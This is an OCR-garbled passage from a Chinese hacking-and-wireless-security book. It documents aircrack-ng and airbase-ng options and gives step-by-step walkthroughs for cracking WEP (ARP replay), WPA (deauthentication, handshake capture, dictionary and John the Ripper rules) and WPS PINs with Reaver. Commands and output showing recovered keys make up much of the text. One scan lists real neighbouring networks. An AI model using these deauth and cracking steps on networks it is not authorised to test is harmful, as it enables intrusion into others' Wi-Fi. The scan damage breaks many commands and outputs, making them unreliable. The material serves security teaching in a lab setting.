-f <fudge>: 穷 举 猜测 因子 ， 默 认 
值 : 2。 

-<korek>: 禁用 一 个 攻击 方法 〈1 一 
I 

-x or -x0: 最 后 一 个 密 钥 字 节 进行 穷 
举 (默认 ) 。 

-x1: 取消 最 后 一 个 密 钥 字 节 的 穷 举 
(默认 ) 。 

-x2: 设置 最 后 两 个 密 钥 字 节 进 行 
穷 举 。 


e -X: 禁用 多 线程 穷 举 。 
e -y: 实验 性 的 单一 穷 举 模式 。 
e -K: 只 使 用 旧 的 KoreK 攻 击 (pre- 
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PTW) 。 


e -s: 破解 时 显示 密 钥 的 ASCI 值 。 

e -M <num>: 指定 最 大 使 用 的 IVs 
(初始 向 量 )。 

。-D: WEP 伪 装 ， 跳 过 坏 掉 的 密 
钥 流 。 

e -P <num>: PTW 排 错 :1: 取 消 Klein 
(方式 ) ，2:PTW 

e -1: 只 运行 一 次 尝试 用 PTW 破 解 
密 钥 。 

e -V: 在 目 视 检查 模式 下 运行 。 

下 图 为 WEP 和 WPA-PSK 破 解 选项 。 

WEP and WPA-PSK cracking options: 
-Ww <words> : path to wordlist(s) filename(s) 


-N <file> : path to new session filename 
-R <file> : path to existing session filenam 


主要 参数 介绍 如 下 : 
e@ -w <words>: 路 径 表 〈s) 的 文件 名 
Cs 
e -N <file>: 新 会 话 文件 名 的 路 径 。 
e@ -R <file>: 现 有 会 话 文件 名 的 路 径 。 
下 图 为 WPA-PSK 的 一 些 选 项 。 
WPA-PSK Options: 
-E <file> : create EWSA Project file v3 


-j <file> : create Hashcat v3.6+ file (HCCAPX 
-] <file> : create Hashcat file (HCCAP) 


-5 ; WPA cracking Speed test 

-Z <sec> : WPA cracking speed test Length of 
execution. 

-Fr <DB> : path to airolib-ng database 
(Cannot be used with -w) 

主要 参数 介绍 如 下 : 


e -E <file>: 创建 项 目 文件 EWSA v3。 
e -J <file>: 创建 Hashcat 捕 获 文件 。 
e@ -S: WPA 破 解 速度 测试 。 


8.2.5 airbase -ng 工具 


airbase-ng 作 为 多 目标 的 工具 ， 通 常 将 
自己 伪装 成 AP 攻击 客户 端 。 该 工具 的 功能 
丰富 多 样 ， 常 用 的 功能 特性 如 下 : 

e 实施 caffe-latte WEP 攻 击 。 

e 实施 hirte WEP 客 户 端 攻击 。 

e 抓 取 WPA/WPA2 认 证 中 的 handshake 

数据 包 。 


e 伪装 成 AD-HocAP。 

e 完全 伪装 成 一 个 合法 的 AP。 

e 通过 SSID 或 者 和 客户 端 MAC 地 址 进 

e 操作 数据 包 并 且 重 新 发 送 。 

e 加 密 发 送 的 数据 包 以 及 解密 抓 取 的 

数据 包 。 

该 工具 的 主要 目的 是 让 客户 端 连 接 上 
伪装 的 AP， 而 不 是 阻止 它 连接 真实 的 AP， 
当 airbase-ng 运 行 时 会 创建 一 个 tap 接 口 ， 这 
个 接口 可 以 用 来 接收 解密 或 者 发 送 的 加 密 
数据 包 。 

一 个 真实 的 客户 端 会 发 送 probe re- 
quest， 在 网 络 中 ， 这 个 数据 帧 对 于 绑 定 客 
户 端 到 伪装 AP 上 具有 重要 的 意义 。 在 这 
种 情况 下 伪装 的 AP 会 回应 任何 的 probe re- 
quest。 建 议 最 好 使 用 过 滤 以 防止 附近 所 有 
的 AP 都 会 被 影响 

下 图 为 airbase-ng 工 具 的 命令 格式 及 参 
数 说 明 。 


主要 参数 介绍 如 下 : 

e@ -a: 设置 软 AP 的 ssid。 

e -i: 接口 ， 从 该 接口 抓 取 数据 包 。 

e -w: 使 用 WEP key 加 密 / 解 密 数 
据 包 。 

e@ -h MAC: 源 MAC 地 址 (在 中 间 人 攻 
击 时 的 MAC 地 址 ) 。 
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e -f disallow: 不 容许 某 个 客户 端的 
MAC 地 址 〈 默 认为 容许 ) 。 

e -W 0|1: 不 设置 WEP 标 志 在 beacon 

(默认 容许 ) 。 

-qd: 退出 。 

-V (--verbose) : 显示 进度 信息 。 

-A: ad-hoc 对 等 模式 。 

-Y inloutlboth: 数据 包 处 理 。 

-c: 信道 。 

-X: 隐藏 ESSID。 

-s: 强制 的 将 认证 方式 设 为 共享 密 

e -S: 设置 共享 密 钥 的 长 度 ， 默 认为 
128bit。 

e -L: caffe-Latte 攻 击 。 

e -N: hirte 攻 击 ， 产 生 ARP request 
against WEP 客 户 端 。 

e -xnbbps: 每 秒 的 数据 包 。 

e -y: 不 回应 广播 的 probes request 
(只 回应 携带 SSID 的 单 播 probe 
request) 。 

e -z: 设置 WPA1 的 标记 ，1 为 WEP40， 
2 为 TKIP，3 为 WRAP，4 为 CCMP， 
5 为 WEP104( 即 不 同 的 认证 方 


式 )“ 

e -Z: 和 -z 作 用 一 样 ， 只 是 针对 
WPA2。 

e -V: 欺骗 EAPOL，1 为 MD5，2 为 
SHA1，3 为 自动 。 


e -Fxxx: 将 所 有 收 到 的 数据 帧 放 到 文 
件 中 ， 文 件 的 前 组 为 xxx。 

e@ -P: 回应 所 有 的 probes request， 包 括 
特殊 的 ESSID。 

e -I: 设置 beacon 数 据 帧 的 发 送 间隔 ， 
单位 ms。 

e -C: 开启 对 ESSID 的 beacon。 

下 图 为 Airbase-ng 工 具 的 文件 选项 

说 明 。 
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Fitter optionss 


--bssid MAC : BSSID to filter/use 
--bssids file  : read a list of BSSIDs out of that file 
--client MAC : MAC of client to filter 


-~-clients file : read a list of MACs out of that file 
--essid ESSID 


--essids file 


: specify a single ESSID (default: default) 
: read a list of ESSIDs out of that file 


主要 参数 介绍 如 下 : 

® --bssid MAC|: 

® --bssids file: 

e --client MAC: 让 制定 MAC 地 址 的 客 
户 端 连接 。 

e --clients file: 让 文件 中 的 MAC 地 址 
的 客户 端 可 以 连接 上 。 

e --essid ESSID: 创建 一 个 特殊 的 
ESSID 。 

® --essids file: 


ESSID 来 过 滤 。 


使 用 工具 破解 无 线路 由 器 
密码 


无 线路 由 器 密码 的 安全 强度 是 进入 
无 线 网 络 的 关键 ， 要 想 从 无 线路 由 器 进入 
内 网 ， 就 必须 知道 无 线路 由 器 的 密码 ， 使 
用 一 些 破解 工具 可 以 破解 出 无 线路 由 器 的 
密码 。 


根据 AP 的 MAC 来 


根据 文件 中 的 BSSID 来 


根据 一 个 文件 中 的 
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名 8.3.1 ”使 用 aircrack-ng 破 解 WEP 密 码 


使 用 aircrack-ng 工 具 可 以 破解 WEP 加 密 


方式 的 无 线路 由 密码 。 破 解 之 前 ， 首 先 登录 


无 线路 由 器 ， 在 “无 线 设 置 ”中 将 “无 线 安 
全 设置 ”设置 成 WEP 加 密 ， 如 下 图 所 示 。 
修改 加 密 方式 后 需 重 启 路 由 器 才能 生效 。 


a WEP 

认证 类 型 : 共享 密 钥 " 

好 ? 密 钥 格式 : ASCI 了 吗 

密 铀 选择 是 P 密 钥 密 角 类 型 
密 钥 1: 六 1234567890123 128 位 Y 
密 钥 2: 禁用 
密 钥 3: 禁用 
密 钥 4: 禁用 v 
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破解 WEP 密 码 的 具体 操作 步骤 如 下 : 
[step 回 执行 airmon-ng strat wlan0 命 令 ， 启 
动 网 卡 并 进入 monitor 模 式 ， 下 图 为 执行 
效果 。 


Fa 


py: viane ogy, Corp. RT2870/RT37O 


(eectean rs 


Te IphyaJwianenon) 
) 


加 二 -ng -c < 信道 > --bssid 
<AP-MAC 地 址 > -w < 保存 文件 名 > 


wlan0mon 命 令 ， 启 动 数 据 抓 包 功能 ， 并 保 
存 抓 取 后 的 文件 ， 如 下 图 所 示 。 
CR 


1C:FA:68:61:2F:08 -8 48 25 3 0 1 54e, WEP WEP Test-e01 


B551D STATION Pm Rate Lost Franes Probe 


CFAi68:612r308 OCOD:CD:OG:FE:CB -1l2 0-6e © 7 


如 果 AP 与 STA 有 关联 ， 可 以 使 用 
arieplay-ng -0 1 -a <AP-MAC 地 址 > -c < 已 连 
接 STA-MAC 地 址 > wlan0mon 命 令 ， 执 行 该 
命令 后 ， 会 解除 AP 与 STA 的 关联 ， 如 下 图 
所 示 。 


FoovaratT JCA SO OT ZPD0 eC DEE ODL CD BHI PERC VanOnon 


1C: FA:68:01:2F:08) on channel 1 
了 See foc:en! cD" Pe cn) | lss Ackall 


step 国 此 时 会 抓 取 到 AP 与 STA 关 联 时 的 密 钥 
这 下 图 为 抓 取 的 密 钥 流 。 


JU a0 bytes Weystrean 


replay ng -9 


ls:15:07 


EEC 


/5 CH Me ENC CIPHER AUTH ESSID 


1 S4e. WEP wEP SKA Test-e01 


BssID STATION pm Rate Lost Frames probe 


ac:FA:68:61:2F:08 OC:6D:CD:66:FE:CB 14 0-9 22 1s9 


执行 ]s 命 令 ， 查 看 当前 目录 可 以 发 现 
有 一 个 .xor 结 尾 的 文件 ， 这 个 文件 保存 着 
STA 关 联 AP 的 密 钥 流 ， 国生 


FooteralLr FUs 


和 
wep-el 


vep- OL 


sa 利用 XOR 文 件 与 AP 建立 关联 ， 一 
旦 获取 到 密 钥 流 便 可 以 将 任意 主机 与 AP 
进行 关联 ， 使 用 aireplay-ng -1 < 间隔 时 
间 > -e <ESSID> -y < 密 钥 流 文件 > -a <AP- 
MAC 地 址 > -h < 需要 建立 关联 的 MAC 地 
址 > wlan0mon 命 令 ， 可 以 使 本 机 与 AP 建立 
关联 ， 如 下 图 所 示 。 
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aaaRSUES-W aireplay-ng -1 66 -e Test-001 -y wep-B1-1C-FA-68-01-2F -8 x0r -a IC:FArG8s 
01:2F:88 -h E8-4E-05-28-AE-46 vtangnon 
ba:35:31 Waiting for beacon trane (BSSID: 1C:FA:68:01:2F:08) on channel 1 


04;35:31 Sending Authentication Request (shared Key) [ACK] 

Ba:35:31 Authentication 1/2 successfol 

p4135:31 Sending encrypred chatlenge. [ACK] 

04:35:31 Authentication 2/2 succes5fol 

|a:35:31 Sending Assoclation Request [ACK] | 
[04:35:31 Association successtul :-) (AID: 1) 


[step 国 执行 ARP 重 放 收集 IV 数 据 ， 执 行 ARP 
重 放 需 要 先 获取 一 个 有 效 ARP 数 据 ， 本 机 
只 是 与 AP 建立 了 关联 并 不 能 进行 通信 ， 所 
以 还 需要 抓 取 一 个 有 效 ARP 通 信 ， 此 时 可 
以 执行 aireplay-ng -3 -b <AP-MAC 地 址 > -h 
< 本 机 MAC 地 址 > wlan0mon 命 令 ， 如 下 图 
所 示 。 


FaaaaRNUE-A GIFEPUGY-N9 “3b CHFATGB O12FrO8 RE-9E-06-76-AE-96 WINMO6G 
B34:39:49 Waiting for beacon frame (855ID; 1C:FA:68:61:2F:08) on channet 1 
aving ARP requests in replay arp-1818-043949.cap 

fou should also start airodunp-ng to capture reptles、 

ad_ 1484 packets (got © ARP requests and 9 ACKs), sent 9 packets 


{9 pps) 


step 图 再 次 解除 AP 与 STA 关 联 ， 触 发 真实 
的 ARP 数 据 包 ， 产 生 以 replay_arp 开 头 的 文 
件 ， 如 下 图 所 示 。 


TREE 


p1010-014337 ,cap 。 wep-6l .cap 
ap- CSY 

wep-01 kismet csv 
LAC-FA-60-01-21-08.x0r wep-0l. Kismet. netxnl 


图 当 产生 这 个 ARP 合 法 数据 包 后 ， 便 会 
开始 真正 的 ARP 重 放 ， 如 下 图 所 示 。 


rp-1918-012700 ,cap 
replay arp- 1918-013325. cap wep 


oot ireplny-ng -3 -DICHFATGU Ol ar 0 -h En-4E-00-20-AE- 6 LO 
[04:44:21 Waiting for be D+ 1C:FA:68:01:2F:08) on channel 1 
Saving ARP requests in reptay_arp-1918-944422.cap 

You shoutd also start atrodump-ng to capture replies 

[head 10658 packets (got 2419 ARP requests and 3686 ACKs), sent 4252 packets.. 


{499 pps) 


[Eee 辆 尽量 多 的 收集 IV， 收 集 的 IV 值 越 多 越 
容易 破解 出 密码 ， 如 下 图 所 示 。 


eH IU ELapsed; 34 nlns 1 2918-19-18 02:07 J{ 148 bytes Keystrean: 1CIFA:68:9152F:08 


ssTD PuR Rx Beacons woata, ws CH Ma ENC CIPWER AUTH ESSID 


CFA:GB:01:2F:08 © S54 12399 144526 9 1 Se, WEP WEP SKA Test-e91 


5sTD STATION pm Rate Lost 。 Franes Probe 
1c:FA:68:91:2F:98 EN:4E:06:28:AE:46 0 日- 1 日 1319964 
IC:FA:68:01:2F:00 DC6D:CD:66:FE:CB -2 le- 6 0 3194 Test-001 


[see 加 使 用 aircrack-ng 工 具 破 解密 码 ， 该 
密码 为 KEY FOUND!。KEY FOUNDI 后 
面 方 括号 中 是 密码 的 十 六 进 制 形 式 ， 之 后 
ASCII: 后 面 便 是 常用 的 字符 囊 密码 ， 如 下 
图 所 示 。 


Alrerack-ng 1.4 


[8:00:80] Tested S11 keys (got 142782 TVs) 


Ka depth byte(vore) 
9 4/ 7 50(157449) 28(155648) 59(155392) ac(154368) BE[154112) 
1 2/ 1 76(159498) ED(156928) 53(156572) D2(155416) 78(155136) 
2 a/ 1 96(199168) 27(158976) 92(158976) 7C(157696) BL(157184) 
3 59/ 3 F6(147455) 20(146944) 3E(146944) 55(145944) 5[145944] 
4 2/ 5 。 05(168068) 58(159488) C4(158976) 3C(156416) 841155648) 


KEY FOUND! 【 31:32:33:34:35:36:37:39:39:39:31:32:33 ] (ASCII: 1234567899123 ) 
Decrypted correctty: 198% 


移 提 示 : 一 旦 收集 到 足够 多 的 IV， 那 么 
破解 WEP 密 码 的 速度 就 非常 快 ， 所 以 采用 
WEP 加 密 是 不 安全 的 。 


8.3.2 使 用 aircrack-ng 破 解 WPA 密 码 


破解 WPA 与 WEP 不 同 ，WEP 需 要 收集 
大 量 IV 数 据 ， 而 WPA 只 要 抓 取 四 次 握手 信 
息 即 可 ， 但 是 如 果 字 典 文件 中 没有 密码 是 
破解 不 出 来 的 。 


1. 认识 字典 文件 

Kali 中 本 身 自 带 了 一 些 字典 文件 ， 查 看 
自 带 字典 文件 的 方法 如 下 。 

(1) /user/share/john 目录 下 的 password. 
lst 字典 文件 ， 如 下 图 所 示 。 


SE 
nm .chr 8.cenf Narelogic.cont Lowerspace, chr ppernam chr 
omspace .chr dmb32conf nman'chr password, sr utf chr 
ph -chr dynaale. conf Uatinl,chr regex alphabets,conf 


sc ,chr dmlc flat sse foraats.cont ln ascil.chr repeais16, Conf 
ro john cont tover chr repeats32, cont 
gits.chr john. local.conf Yowernun. chr upper. chr 


(2) /usr/share/wfuzz/wordlist/general 日 
录 下 的 字典 文件 ， 如 下 图 所 示 。 


FoatBRaUI:7Usr7SRare7WTUZz7wordUiStJOeneratg TS -TaR 

总 月 显 488K 

drwxr-xr-x 2 root root 4.0K 16 月 8 60:58 

drwxr-xr-x 8 root root 4.9K 8 月 21 96:52 

上 root root 2.5K 3 月 25 2918 admin-panels.txt 
root root 22K 3 月 25 2818 big,txt 

root root 1.2K 3 月 25 2018 catala.txt 

root root 6.4K 3 月 25 2918 comnon.txt 

root root 278 3 月 25 2918 euskera.txt 

root root 141 3 月 25 2018 extensions common.txt 
root root 238 3 月 25 2618 http methods.+txt 
root root 12K 3 月 25 2918 medium.txt 

root root 491K 3 月 25 2918 megabeast.txt 

root root 244 3 月 25 2918 mutations commcen.txt 
root root 2.1K 3 月 25 2918 spanish.txt 

root root 79 3 月 25 2918 test.txt 


EEEEEEEEE 


us 


(3) /usr/share/wfuzz/wordlist/Injections 
目录 下 的 字典 文件 ， 如 下 图 所 示 。 


总 用 量 46K 


drwxr-xr-x 2 root root 4.0K 16 月 8 69:58 

drwxr-xr-x 8 root root 4.9K 8 月 21 96:52 

rw-r--r-- 1 root root 11K 3 月 25 2918 All attack.txt 
-rw-r--r-- 1 root root 59 3 月 25 2918 bad _ chars.txt 
rw-r--r-- 1 root root 1.6K 3 月 25 2618 SQL.txt 
-rw-r--r-- 1 root root 3.4K 3 月 25 2918 Traversal.txt 
-rw-r--r-- 1 root root 1.5K 3 月 25 2918 XML.txt 
-rw-r--r-- 1 root root 2.4K 3 月 25 2918 XSS.txt 


(4) /usr/share/wfuzz/wordlist/others 目 
录 下 的 字典 文件 ， 如 下 图 所 示 。 


root@kali: /usr/share/wruzz/wordlist/others# Ls -Lah 
总 用 量 72K 

ldrwxr-xr-x 2 root root 4.6K 16 月 
drwxr-xr-x 8 root root 4.6K 8 月 
-rw-r--r-- 1 root root 418 3 月 
-rw-r--r-- 1 root root 59K 3 月 


8 69:58 

21 96:52 . 

25 2918 common pass.txt 
25 2018 names.txt 


和 


SS 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


(5) /usr/share/wfuzz/wordlist/stess 目录 下 
的 字典 文件 ， 如 下 图 所 示 。 


a Ts -Tah 


总 用 量 184K 
-x 2 raot 
root 


root 
root 


4.6K 16 月 8 699:58 - 


4.6K 8 月 21 96:52 


raot root 189 3 月 25 2018 alphanun case extra.txt 
root root 124 3 月 25 2818 alphanun case.txt 

root root 52 3 月 25 2018 char.txt 

raot root 1.5K 3 月 25 2818 doble uri hex.txt 

root root 155K 3 月 25 2018 test ext.txt 

raot root 1.6K 3 月 25 2918 uri hex.txt 


(6) /usr/share/wfuzz/wordlist/webservic- 
es 目录 下 的 字典 文件 ， 如 下 图 所 示 。 


root@kali: /usr/share/wfuzz/wordlist/webservices# ls -Lah 
总 用 量 16K 

drwxr-xr-x 2 root root 4.0K 16 月 8 90:58 

drwxr 8 root root 4.9Kk 8 月 21 96:52 

-rw - 1 root root 453 3 月 25 2018 ws-dirs.txt 
-rw-r--r-- 1 root root 111 3 月 25 2918 ws-files.txt 


(7) /usr/share/wfuzz/wordlist/vulns 目录 
下 的 字典 文件 ， 如 下 图 所 示 。 


rootakall: /usr/share/wTuzz/wordlist/vulns# Ts -Utah 


总 用 量 446K 
Idrwxr-xr-x 2 root root 4.0K 16 月 8 69:58 
drwxr-xr-x B root root 4.0K 3 月 21 66:52 
ry-r--r-- 1 root root 230 3 月 25 2918 apache.txt 
- -- 1 root root 198K 3 月 25 2918 cgls.txt 
-1 root root 706 3 月 25 2918 coldfusion.txt 
1 root root 74K 3 月 25 2918 dirTraversal-nix.txt 
~ 1 root root 71k 3 月 25 2918 dirTraversal.txt 
- 1 root root 72k 3 月 25 2918 dirTraversal-win.txt 
1 root root 3,1K 3 月 25 2918 domino.txt 
~ 1 root root 15k 3 月 25 2918 fatwire payenanes.txt 
-1 root root 863 3 月 25 2918 fatwire.txt 
1 root root 383 3 月 25 2918 frontpage.txt 
~ 1 root root 483 3 2 zol 115.tXt 
~ 1 root root 365 3 月 25 2918 iplanet.txt 
1 root root 306 3 月 25 2918 jrun.txt 
~ 1 root root 155 3 25 2918 netvare.txt 
~ 1 root root 295 3 月 25 2918 oracte9i.txt 
1 root root 16K 3 月 25 2918 sharepoint.txt 
- 1 root root 571 3 有 25 2918 sql_inj.txt 
~ 1 root root 976 3 月 25 2918 sunas.txt 
1 root root 229 3 月 25 2918 tests.txt 
1 root root 1.8K 3 月 25 2918 tomcat.txt 
~ 1 root root 536 3 月 25 2918 vignette.txt 
- 1 root root 2.4K 3 月 25 2918 weblogic.txt 
1 root root 7.4K 3 月 25 2918 websphere.txt 


(8) /usr/share/wordlist 目录 下 的 字典 文 
件 ， 如 下 图 所 示 。 


0x R21 00:32 
i 
5 8 1 


(9) /usr/share/wordlist 目录 中 有 一 个 压 
缩 文件 rockyou.txtgz。 其 中 也 包含 一 个 字 
典 文件 解压 缩 ， 如 下 图 所 示 。 


root@kali: /usr/share/wordlists# gunzip rockyou.txt.gz 
Iroot@kali:/usr/share/wordlists# ls 

Hirb dnsmap .txt fern-wifi nmap-tst sqlnap.txt 
dirbuster fasttrack.txt metasploit rockyou.txt wfuzz 
Iroot@kali: /usr/share/wordlists# cat rockyou.txt | wc -1 
14344392 


2. 破解 WPA 密 码 
破解 文件 之 前 ， 首 先 需要 设置 无 线路 
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由 器 的 加 密 方式 ， 设 置 方法 为 ; 首先 登 
录 无 线路 由 器 ， 在 “无 线 设置 ”中 将 “无 
线 安全 设置 ”设置 成 WPA 加 密 ， 如 下 图 
所 示 。 修 改 加 密 方式 后 需 重 启 路 由 才能 
生效 。 


国 Ph-TSKWPM-PSK 


认证 类 型 : 自动 y 
加 本 算法 : 自动 " 
PSED: Password 
《8-63 个 ASCIIT 码 字符 或 8-64 个 十 六 进 制 字符 ) 
EN 86400 


(单位 为 秒 ， 最 小 值 为 300， 不 更 新 则 为 0) 


破解 WPA 密 码 的 具体 操作 步 又 如 下 : 
使 用 airmon-ng strat wlan0 命 令 启 动 网 
卡 并 进入 monitor 模 式 ， 如 下 图 所 示 。 


FOTN 17m0N -ng Start Wand 


pr intertace Driver chipset 


py vane rt28seusb Ralink Technotagy，corp。，RT287B/RT3878 


macs9211 nonitor mode vif enabled for Lphyljwtang on Lphyljwtanenon) 
fmacg9211 station mode vif disabled for [phy1]wtang) 


[step 图 使 用 airodump-ng -c < 信道 > --bssid 
<AP-MAC 地 址 > -w < 保存 文件 名 > 
wlan0mon 命 令 ， 启 动 数据 抓 包 功能 ， 并 保 
存 抓 取 后 的 文件 ， 如 下 图 所 示 。 


[on IU Eapsed: 1 min JU 207 


61 23727 


lassrp Pa AO Beacons #0ata, whs CH Ma ENC CIPHER AUTH ESSID 


1C:FA:68:01:2F:68 1 53 459 16 0 1 270 WPA2 ccmp psk Test-001 
less1D STATION Pu mate Lost Frames probe 
csFA:68:01:2F:08 DC:6D:CD:66:FE:CE 1 0-6 1 了 


[step 图 如 果 AP 与 STA 有 关联 ， 可 以 使 用 
arieplay-ng -0 1 -a <AP-MAC 地 址 > -c < 已 连 
接 STA-MAC 地 址 > wlan0mon 命 令 ， 执 行 该 
命令 后 ， 会 解除 AP 与 STA 的 关联 ， 如 下 图 
所 示 。 


Footakal ls-e aireplay -ng -9 1 -a 1CFA:68:01:2F:08 -C DC:6D:CD: 66:FE:CH wononon 
ls:15:06 waiting for beacon trane (BSSID: 1C:FA:68:91:2F:98) on channet 1 
le4:15:07 Sending 64 directed DeAuth (code 7). STHAC: [DC:6D:CD:66:FE:CB] [ 9|55 Acks] 


step 园 当 抓 取 到 AP 与 STA 关 联 时 的 四 次 握手 


[on 1 IU Elapsed: 3 nins Jl 2018-10-18 23:30 J WPA handshake: IC:FA68:01:2F: On 


信息 ， 


ssr PRX9 Beacons #0ata, #/s CH Me ENC CIPHER AUTH EsSIO 
esFA:8:01:2F:98 1 39 1l16 83 2 1 278 WpA2 cchp Psk Test-001 
essmm STATION pm Rate Lost Franes Probe 


1C:FA:68:91:2F:88 DC:60:CD:66:FE:CB © 


Estee 图 使 用 aircrack-ng -w < 字典 文件 > 
wpa-01.cap 命 令 ， 即 可 破解 出 WPA 密 码 ， 

下 图 所 示 。 可 以 看 到 每 秒 筛选 2174 个 密码 
文件 ， 如 果 字 典 中 存在 密码 文件 一 定 会 破 


1le- ee 1912 92 Test-001 


解 出 来 ， 这 里 获取 的 密码 为 Password。 


[ee:69:09] 172/647 keys tested (2174.95 k/s) 


Time left: 9 seconds 26.58% 


KEY FOUND! [ Password ] 


: B2 94 7A FB 6C 35 F6 53 DD BF 7F 06 4A 46 17 AB 
D1 43 4A 74 D1 42 39 98 66 26 69 5C D5 B87 BD 17 


Master Key 


: S51 FB B2 JC FA 78 1F gD ES B4 47 12 E9 568 OA @8 
46 69 45 F9 E9 15 18 EA 45 34 D3 D2 E9 6F DC 2E 


Transient Key 


FB 9A FE 82 59 92 77 D5 F1 94 89 99 99 99 69 66 
‘90 00 66 99 00 99 99 99 6 66 99 09 99 99 99 ee 


EAPOL_HMAC : 3E 78 E2 FA C6 9D 53 78 Fe 95 BF F7 EC 7C 7B A2 | 


8.3.3 ”使 用 JTR 工 具 破 解 WPA 密 码 


JTR (John the Ripper) 是 一 个 快速 的 
密码 破解 工具 ， 用 于 在 已 知 密 文 的 情况 下 
尝试 破解 出 明文 的 密码 软件 ， 支 持 目前 大 
多 数 的 加 密 算法 。 

使 用 JTR 〈John The Ripper) 破解 密码 
的 操作 步骤 如 下 : 
打开 配置 文件 并 搜索 List.Rules: 
Wordlist 字 段 ， 如 下 图 所 示 。 


# Wordlist mode rules 
[List.Rules:Wordlist] 
# Try words as they are 


# Lowercase every pure alphanumeric word 
-C >3 !?X 1LQ 

# 罩 Capitalize every pure alphanumeric word 
-C (?a >2 !?X CQ 


调整 到 List.Rules:Wordlist 字 段 的 结尾 
处 ， 加 入 “9$[0-9] $[0-9] $[0-9] $[0-9]” 字 
段 ， 如 下 图 所 示 ， 这 样 便 可 以 修改 密码 生 
成 规则 。 

-[:c] <* >2 !?A \pl[1lc] M [PI] 0 

# Try the second half of split passwords 

5S Xa*# 

-S$-C Xx** M1OQ 

$[0-9]$[0-9]$[0-9]$[0-9] 

# Case toggler for cracking MD4-based NTLM hashes 
# given already cracked DES-based LM hashes . 


# Use --rules=NT to Use this 
[List.Rules:NT] 


[step 图 使 用 john --wordlist=< 密 码 文 件 > 
--rules --stdout 命 令 ， 可 以 通过 相应 的 规则 
生成 密码 ， 如 下 图 所 示 。 其 中 --wordlist 是 
读 取 密码 文件 ; --rules 对 该 文件 使 用 规则 ; 
--stdout 进 行 显示 。 
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root@kali:-~# john --wordlist=dd.txt --rules --stdout 
1559992 
1599992 
1361234 
1321234 


Mp 9:99:99:699 196.96s (2918-16-19 95:14) 49.99p/S 1321234 
[step 园 使 用 john --wordlist=dd.txt --rules 
--stdout | aircrack-ng -e Test-001 -w - wpa-01.cap 
命令 ， 配 合 aircrack-ng 进 行 密码 破解 。 下 图 
为 执行 效果 ， 可 以 看 出 密码 为 Password666。 


[89:68:00] 4 keys tested (21.53 k/s) 


Current passphrase: Password666 


: AB 3D B3 21 F4 86 8F 07 7D CE 6E E9 33 75 4E 98 
66 34 78 83 48 EA 70 A@ DA F9 A4 85 81 18 76 6B 


Master Key 


Transient Key : El D9 12 9A 10 34 8D 28 73 D4 38 AE BB BD 1E 9D 
88 53 E7 DD 85 81 Fa 28 C9 87 36 63 AB 41 65 63 
59 75 9D 96 68 69 3F 81 BB SF 29 55 86 58 3C FA 
BA F4 F5 F4 CC AE 64 FD 3E 3E 58 1A OD E8 DC 3B 


EAPOL HMAC : 93 46 82 15 49 1F 11 48 GE A5 9 08 F2 4C 72 42 


Passphrase not in dictionary 


8.3.4 使 用 Reaver 工 具 破 解 WPS 密 码 


Reaver 工 具 是 目前 流行 的 无 线 网 络 攻击 部 党 


工具 ， 它 主要 针对 的 是 WPS 漏 洞 。Reaver 
工具 会 对 WiFi 保 护 设置 (WPS) 的 注册 PIN 
码 进行 暴力 破解 攻击 ， 并 尝试 恢复 出 WPA/ 
WPA2 密 码 。 

使 用 Reaver 工 具 破 解密 码 的 操作 步 又 
如 下 : 
[steep 回 使 用 reaver 命 令 ， 查 看 reaver 工 具 的 帮 
助 信息 ， 下 图 为 所 需 参 数 。 


|reerewati:-a reaver 


ea， 


.5 WIF1 protected setup Attack Toal 
{©) 2011, Tactical Netverk solutions, Cralg Heffner <cheffnergetacnetsot com> 


IRequired Arguments 


Nane of the nonitor-node lnterface to use 
BSSIO of the target AP 


将 网 卡 设置 成 monitor 模 式 ， 了 寻找 支 
持 WPS 的 AP， 使 用 wash -U -i wlan0mon 命 
令 。 下 图 为 执行 效果 。 其 中 -U 是 表示 以 
UTF-8 字 符 编码 进行 显示 ，-i 是 具体 使 用 的 
网 卡 接口 。 


1 ace=-vtan> 
-b ~-bssid=<nac> 


rootekati:-# wash -U -i wLangmon 
Ch den WPS Lck Vendor ESSID 
9 -59 2.6 No Ralinkre ”小 米 共享 WiFi D968 
11 -57 2.6 No Broadcom Chinanet-KTJK9F 
4 -59 2.0 No RatinkTe lfwx 
11 -57 2.0 No Unknown wangyangyang 
11 -61 2.6 No Unknown TP-LINK EAD554 
1 -59 2.9 No 主推 63- 
8 -61 1.6 No RatinkTe ChinaNet-TKae 
4 -61 2.0 No RatinkTe ChinaNet-nkkk 
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SS 黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


侈 提 示 : 还 可 以 使 用 airodump-ng 这 个 工具 
来 寻找 支持 WPS 的 AP， 使 用 airodump-ng 一 
wps wlan0mon 命 令 ， 同 样 可 以 寻找 到 支持 
WPS 功 能 的 AP， 下 图 为 执行 效果 。 


EEC 
Ch 5 II Elapsed: 39 s 1 2818-18-28 00:55 


F41831CD133160173 20 
CrFAz6810112F308 30 但 
ER:6B:A3:7C:B1389 -36 了 
188:A317C:B1185 

:8683:A337C3B1381 

E4:68:A37C:EF:FS -39 
E46:A3:7CIEF;F2 “四 


破解 PIN 码 ， 使 用 reaver -i wlan0mon 
-b <AP-MAC 地 址 > -vv -c 3 命令 ， 其 中 -vv 是 
显示 详细 信息 ，-c 选 择 信道 ， 如 下 图 所 示 。 
每 次 随机 选择 一 个 PIN 码 进行 发 送 。 

+] Trying pin "33335674™ 

+] Sending authentication request 

+] Sending association request 

+] Associated with 1C:FA:68:81:FB:EA (ESSID: TP-LINK 81FBEA) 
+] Sending EAPOL START request 

+] Received identity request 

+] Sending identity response 

+] Received M1 message 

+] Sending M2 message 

+] Received M3 message 

+] Sending M4 message 

+] Received WSC NACK 

+] Sending WSC NACK 

+] 0.05% complete @ 2018-11-04 23:55:33 (28 seconds/pin) 


人 移 提 示 : 在 破解 的 过 程 中 ， 如 果 加 入 -K 1 
参数 ， 可 以 快速 破解 出 AP 的 PIN 码 。 


step 加 获取 到 PIN 码 后 ， 可 以 通过 PIN 码 获 
取 密 码 ， 这 时 可 以 使 用 reaver -i wlan0mon 
-b<AP-MAC 地 址 > -vv -p <PIN 码 > 命令 来 获 
取 密 码 ， 这 里 获取 的 密码 为 Password， 如 下 
图 所 示 。 


下 


[FI Received MI message 
[+] Sending M2 message 

[+] Received M3 message 

[+] Sending M4 message 

[+] Received M5 message 

[+] Sending M6 message 

[+] Received M7 message 

[+] Sending WSC NACK 

[+] Sending WSC NACK 

[+] Pin cracked in 4 seconds 

[+] WPS PIN: “35169857 

